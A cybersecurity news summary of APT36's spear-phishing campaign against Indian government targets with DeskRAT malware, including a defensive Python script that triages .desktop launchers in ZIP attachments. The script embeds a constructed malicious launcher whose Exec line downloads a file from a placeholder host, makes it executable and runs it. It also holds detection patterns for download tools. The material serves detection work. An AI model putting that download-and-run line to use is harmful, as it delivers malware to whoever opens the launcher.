Concise Cyber


APT36 Targets Indian Government with Golang DeskRAT Malware Campaign

A Pakistan-nexus threat actor, identified as APT36, also known by the alias Transparent Tribe, has been observed executing a series of spear-phishing attacks. These campaigns specifically targeted Indian government entities, utilizing a Golang-based malware known as DeskRAT. This state-sponsored hacking group has a documented history of activity dating back to at least 2013, consistently focusing on cyber espionage operations.

APT36 Campaign Attribution and Timeline

The recent activity was observed and documented by Sekoia during August and September 2025, and Sekoia attributed it to Transparent Tribe (APT36). The campaign builds on, and is consistent with, an earlier campaign disclosed by CYFIRMA in August 2025, which points to a sustained and ongoing threat. The use of DeskRAT shows the actor's toolkit continuing to evolve.

Sophisticated Attack Chain and Malware Delivery

The attack chains began with spear-phishing emails that either carried a malicious ZIP attachment directly or linked to an archive hosted on a legitimate cloud service such as Google Drive. The ZIP file contained a malicious Desktop file that embedded two commands: one displayed a decoy PDF named “CDS_Directive_Armed_Forces.pdf” in Mozilla Firefox, while the other launched the main DeskRAT payload. Both the decoy PDF and the payload were retrieved from the external server “modgovindia[.]com”. Showing a plausible document while the implant starts in the background let APT36 keep the intrusion unnoticed while deploying its espionage tooling against Indian government targets.
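The delivery pattern above (a launcher file inside a ZIP whose commands show a decoy document and fetch a second file from a remote server) is something a mail gateway or triage analyst can check for mechanically. The following is an added example written for this summary, not Sekoia's or CYFIRMA's tooling, and it assumes the "Desktop file" is a Linux `.desktop` launcher with an `Exec=` line; the sample launcher, its domain names and the file names in it are constructed placeholders, not the article's infrastructure.

```python
"""Triage helper (constructed example): unpack a ZIP attachment, find .desktop
launchers and flag Exec= lines that fetch remote content and chain a decoy
document command with a second command."""
import configparser
import io
import re
import zipfile

# Constructed sample launcher shaped like the lure described in the article.
# The domains are placeholders, not the reported infrastructure.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=CDS_Directive_Armed_Forces.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s https://decoy.example.invalid/d.pdf -o /tmp/d.pdf; firefox /tmp/d.pdf & curl -s https://c2.example.invalid/svc -o /tmp/.svc; chmod +x /tmp/.svc; /tmp/.svc"
"""

# Constructed benign launcher, used to show the checks stay quiet on ordinary entries.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
"""

URL_RE = re.compile(r"https?://[^\s\"';&|]+")
CHAIN_RE = re.compile(r"(;|&&|\|\|)")
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
DOC_NAME_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)


def parse_desktop(text):
    """Return the [Desktop Entry] section as a dict with lower-case keys, or None."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return None
    return dict(cp["Desktop Entry"])


def triage_desktop(text):
    """Return a list of human-readable findings for one .desktop file."""
    entry = parse_desktop(text)
    if entry is None:
        return ["no [Desktop Entry] section"]
    findings = []
    name = entry.get("name", "")
    exec_line = entry.get("exec", "")
    # A launcher that names itself like a document is the classic lure shape.
    if DOC_NAME_RE.search(name) and entry.get("type", "").lower() == "application":
        findings.append("document-like Name on an Application launcher")
    for url in URL_RE.findall(exec_line):
        findings.append(f"remote URL in Exec: {url}")
    if CHAIN_RE.search(exec_line):
        findings.append("multiple commands chained in Exec")
    tools = sorted(set(DOWNLOADER_RE.findall(exec_line)))
    if tools:
        findings.append("download tool in Exec: " + ", ".join(tools))
    if re.search(r"chmod\s+\+x", exec_line):
        findings.append("Exec marks a downloaded file executable")
    return findings


def triage_zip(zip_bytes):
    """Map each .desktop member of a ZIP archive to its findings."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".desktop"):
                text = zf.read(info).decode("utf-8", errors="replace")
                results[info.filename] = triage_desktop(text)
    return results


def build_sample_zip():
    """Build an in-memory ZIP holding the constructed sample launcher."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("CDS_Directive_Armed_Forces.pdf.desktop", SAMPLE_DESKTOP)
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in triage_zip(build_sample_zip()).items():
        print(member)
        for finding in findings:
            print("  -", finding)
```

The checks are deliberately coarse: a document-style name on an `Application` launcher, any remote URL in `Exec=`, several commands chained into one line, a download tool and a `chmod +x` are each individually common in legitimate software, but together they reproduce the decoy-plus-payload shape the article describes, so scoring their co-occurrence is more useful than alerting on any single one.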

All articles here are written with the help of AI on the basis of openly available information which cannot be independently verified. We do strive to quote the relevant sources. The intent is only to summarise, in our own words, what is already reported in public forums, with no intention to plagiarise or copy other people’s work. The publisher has no intent to defame or cause offence to anyone, any person or any organisation at any moment. The publisher assumes no responsibility for any damage or loss caused by making decisions on the basis of whatever is published on cyberconcise.com. You’re advised to do your own checks and balances before making any decision, and owners and publishers at cyberconcise.com cannot be held accountable for its resulting ramifications. If you have any objections or concerns, or want to point out anything factually incorrect, please reach out using the form on https://concisecyber.com/about/
